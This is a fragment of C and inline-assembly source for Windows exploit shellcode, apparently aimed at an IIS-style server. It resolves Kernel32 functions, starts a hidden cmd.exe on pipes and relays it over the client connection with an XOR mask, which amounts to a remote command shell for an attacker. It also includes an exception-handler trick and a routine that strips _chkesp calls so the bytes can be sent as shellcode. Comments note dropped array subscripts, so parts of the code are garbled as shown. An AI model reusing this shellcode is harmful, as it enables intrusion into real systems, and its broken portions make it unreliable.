/t/t/t break;
/t/t/t}
/t/t }
/t/t }
/t }
/t }
// Search for the KERNEL32.DLL module base and the address of GetProcAddress.
// Note: this handles the case where a probed page is not mapped.

/tif(procgetadd==0) goto die ;

/* Resolve the remaining APIs; advance stradd to the next name each time. */
/t for(k=1;k<SHELLFNNUMS;++k) {
/t/tapifnadd[k]=procgetadd(libhandle,stradd);
/t/tfor(;;++stradd){
/t/t if(*(stradd)==0&&*(stradd+1)!=0) break;
/t/t}
/t/t++stradd;
/t }

/t sa.nLength=12;   /* sizeof(SECURITY_ATTRIBUTES) on 32-bit */
/t sa.lpSecurityDescriptor=0;
/t sa.bInheritHandle=TRUE;

/t CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
/t CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);


// ZeroMemory(&siinfo,sizeof(siinfo));
/* Zero 0x11 dwords (68 bytes) of siinfo by hand -- no CRT/API call needed. */
/t _asm{
/t/t lea EDI,siinfo
/t/txor eax,eax
/t/tmov ecx,0x11
/t/trepnz stosd
/t }
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
k=0;
// while(k==0)
// {
/* stradd now points at the command line; bInheritHandles=1 so the child
 * gets the pipe ends.  stradd+=8 then skips "cmd.exe\0" to the exit line. */
/tk=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
/tstradd+=8;
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
/* Banner: 8 bytes past the "exit" line -- the "XORDATA" marker. */
k=8;
writeclient(ConnID,stradd+9,&k,0);

lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;


while(1) {
/tPeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
/tif(lBytesRead>0) {
/* cmd.exe output pending: read it, mask it, push it to the client. */
/t ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
/t if(lBytesRead>0) {
/t for(k=0;k<lBytesRead;++k){
/t/tlockintvar2=lockintvar2*0x100;
/t/tlockintvar2=lockintvar2%LOCKBIGNUM;
/t/tlockcharvar=lockintvar2%0x100;
/t/tBuff[k]^=lockcharvar; // DATAXORCODE;
///t/tBuff[k]^=DATAXORCODE;
/t }
/t writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
/t }
/t}
/telse{
/* Otherwise block on the client; a failed read means the attacker is gone. */
/t lBytesRead=SHELLBUFFSIZE;
/t k=readclient(ConnID,Buff,&lBytesRead);
/t if(k!=1){
/t/tk=8;
/t/tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
/t/tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
/t/tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
/t/twhile(1){
/t/t Sleepadd(0x7fffffff);/t/t // hang forever
/t/t}
/t
/t }
/t else{
/* Unmask the command and feed it to cmd.exe's stdin. */
/t/tfor(k=0;k<lBytesRead;++k){
/t/t lockintvar1=lockintvar1*0x100;
/t/t lockintvar1=lockintvar1%LOCKBIGNUM;
/t/t lockcharvar=lockintvar1%0x100;
/t/t Buff[k]^=lockcharvar; // DATAXORCODE;
///t/t Buff[k]^=DATAXORCODE;
/t/t}
/t/tWriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
///t Sleepadd(1000);
/t }
/t}
}

die: goto die ;
/t_asm{

/* getexceptretadd: patch our return address into errprogram's placeholder
 * (stradd-0x0e) so a fault resumes at the scan loop. */
getexceptretadd: pop eax
/t/t push eax
/t/t mov edi,dword ptr [stradd]
/t/t mov dword ptr [edi-0x0e],eax
/t/t ret
/* errprogram: SEH handler body -- set CONTEXT.Eip and continue execution. */
errprogram:/t mov eax,dword ptr [esp+0x0c]
/t/t add eax,0xb8
/t/t mov dword ptr [eax],0x11223344 //stradd-0xe
/t/t xor eax,eax/t/t//2
/t/t ret/t/t/t//1
execptprogram: jmp errprogram/t //2 bytes stradd-7
nextcall:/t call getstradd/t //5 bytes
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t}/t
}



/*
 * Patch `call _chkesp` out of a copied function body.
 *
 * MSVC debug builds insert `call _chkesp` (E8 rel32) after inline asm; once
 * the bytes run on the target that relative call would land on garbage.
 * For every 0xE8 in shellbuff the call target is reconstructed against the
 * ORIGINAL location (fnadd + i + 5 + rel32, since the copy lives elsewhere)
 * and, if it is _chkesp, the 5 bytes become nop / inc ebx / dec ebx /
 * inc ebx / dec ebx -- same length, ebx unchanged.
 *
 * fnadd:     address of the function in this process
 * shellbuff: the copy being prepared for sending (patched in place)
 * chkesp:    resolved address of _chkesp (after any jmp thunk)
 * len:       number of bytes to scan
 *
 * NOTE(review): transcription dropped subscripts -- `temp=shellbuff;` and
 * `shellbuff=0x90;` should read shellbuff[i].  Also, a 0xE8 within the last
 * 4 bytes makes the rel32 read run past len.
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;

for(i=0;i<len;++i){
temp=shellbuff;
if(temp==0xe8){
/t k=*(int *)(shellbuff+i+1);
/* target = address of the byte after the call + displacement */
/t calladd=fnadd;
/t calladd+=k;
/t calladd+=i;
/t calladd+=5;
/t if(calladd==chkesp){
/t shellbuff=0x90;
/t shellbuff[i+1]=0x43; // inc ebx
/t shellbuff[i+2]=0x4b; // dec ebx
/t shellbuff[i+3]=0x43;
/t shellbuff[i+4]=0x4b;
/t }
}
}
}
